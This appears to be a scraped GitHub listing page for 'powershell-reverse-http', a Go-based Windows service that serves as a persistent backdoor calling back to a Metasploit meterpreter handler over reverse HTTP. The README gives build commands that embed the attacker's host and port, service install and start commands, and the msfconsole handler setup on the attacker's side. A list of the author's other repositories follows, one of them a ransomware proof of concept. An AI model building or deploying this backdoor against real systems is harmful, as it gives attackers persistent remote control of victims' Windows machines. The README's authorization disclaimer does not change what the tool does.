mauri870/powershell-reverse-http mauri870/powershell-reverse-http

  • Stars
    star
    117
  • Rank 301,828 (Top 6 %)
  • Language
    Go
  • Created over 8 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
mauri870/powershell-reverse-http
github

mauri870

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

😇 A Powershell exploit service that opens a reverse http connection via meterpreter

Powershell Reverse Http

Note: Use this program at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authorization

Meterpreter-like backdoors are a pretty common attack vector and most decent antiviruses detect this behavior as a virus.

A simple windows service running on background that connects with a meterpreter session via http.

Usage

First, you need go for build the binary (duh!) and metasploit-framework to accept the reverse connection:

git clone https://github.com/mauri870/powershell-reverse-http.git
cd powershell-reverse-http
env GOOS=windows go build -ldflags "-X main.LHOST=10.10.10.2 -X main.LPORT=3000" -o powershell-reverse.exe

Change the LPORT and LHOST to match your metasploit handler

Usage

powershell-reverse.exe
no command specified

usage: powershell-reverse.exe <command>
       where <command> is one of
       install, remove, debug, start, stop, restart, pause or continue.

After install and start, the service is always up and trying to connect on host and port specified on exploit.go

On the attacker's machine:

./msfconsole --quiet
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST YOUR_IP_ADDRESS_HERE
LHOST => YOUR_IP_ADDRESS_HERE
msf exploit(handler) > set LPORT YOUR_PORT_TO_AWAIT_CONNECTION_HERE
LPORT => YOUR_PORT_TO_AWAIT_CONNECTION_HERE
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://LHOST:LPORT
[*] Starting the payload handler...

More Repositories

1

ransomware

A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
Go
875
star
2

tradingview-no-ads

A simple extension that removes the annoying ads from the free plan of TradingView
JavaScript
69
star
3

api-skeleton-laravel

An API Skeleton for Laravel 5.1 with JWT
PHP
55
star
4

baking-pi

My code for Baking Pi - Operating Systems Development online course by Cambridge University (Raspberry Pi 3 update)
Assembly
25
star
5

laravel-jaeger-demo

A simple demo application showing how to integrate the distributed tracing system Jaeger with a Laravel app.
PHP
22
star
6

gcsfs

Golang io/fs implementation for Google Cloud Storage
Go
12
star
7

laravel-installer

[DISCONTINUED] Install Laravel Framework with any version you want.
PHP
8
star
8

gochain

A simple Blockchain implementation in Go
Go
8
star
9

assembly-fun

Some fun in assembly Linux x64
Assembly
7
star
10

mauri870.github.io

My personal website built with Vuejs 3, Webpack 4, SCSS, Pug and ☕ - https://mauri870.github.io
JavaScript
7
star
11

rust-fann-mnist

MNIST trained in rust using the fann library
Rust
6
star
12

cryptofile

Encrypt or decrypt files using AES-256 or AES-128
Go
6
star
13

kaggle-cats-vs-dogs-redux

My simple solution for the Kaggle Cats vs Dogs Redux competition
Go
6
star
14

laravel-linkedin

[DISCONTINUED] Linkedin API integration for Laravel and Lumen 5
PHP
6
star
15

dot-files

My personal dot files and configs
Shell
5
star
16

rtpproxy-http-monitor

A simple http server that exposes a health check for a RTP proxy instance
Go
5
star
17

iowatch

Cross-platform way to run arbitrary commands when files change
Rust
5
star
18

asterisk-service-discovery

An example of running Asterisk nodes on Kubernetes with service discovery using Etcd
Shell
4
star
19

VoxelSpace9

Voxel Space like engine implemented in Plan9.
C
3
star
20

k8s-controller-heartbeat

A Kubernetes controller that exposes monitoring endpoints via HTTP to check the availability of deployments running in the cluster
Go
3
star
21

fluxoti-test

A simple vue and laravel test
PHP
2
star
22

react-native-webview-ios-16.1-crash

POC for a bug with react-native-webview crashing on IOS 16.1
Swift
2
star
23

go-by-example

My go examples for practice
Go
2
star
24

go-problems

Basic mathematical and real world problems resolved in go
Go
2
star
25

curriculum-vitae

My curriculum vitae
TeX
2
star
26

g

Assembly
2
star
27

go-ringbuffer

a lock free, zero allocation ringbuffer implementation in Go
Go
2
star
28

syscall

syscall(1) - Test a linux system call
C
1
star
29

site

PHP
1
star
30

nubank-app-clone

TypeScript
1
star
31

vuex-router-sync-fullpath

JavaScript
1
star
32

void

Send data into the void
Rust
1
star
33

doctrine-test

PHP
1
star
34

electron-vue-test

JavaScript
1
star
35

kubectl-renew

Kubectl plugin to renew(restart, start fresh) a single or all pods in a deployment, rc or daemonset
Shell
1
star
36

silex-skeleton

A simple skeleton application for Silex Framework
HTML
1
star
37

patches

A bunch of patches that may (or may not) be sent upstream
1
star
38

lottery-sol

A simple lottery smart contract
JavaScript
1
star
39

certificates

1
star
40

xml-parser

PHP
1
star
41

9timeout

timeout(1), but for Plan9
C
1
star
42

x

Mauri's Go supplementary packages
Go
1
star
43

gosumfix

CLI and git merge driver to automatically fix conflicts in go.sum and go.mod files
Go
1
star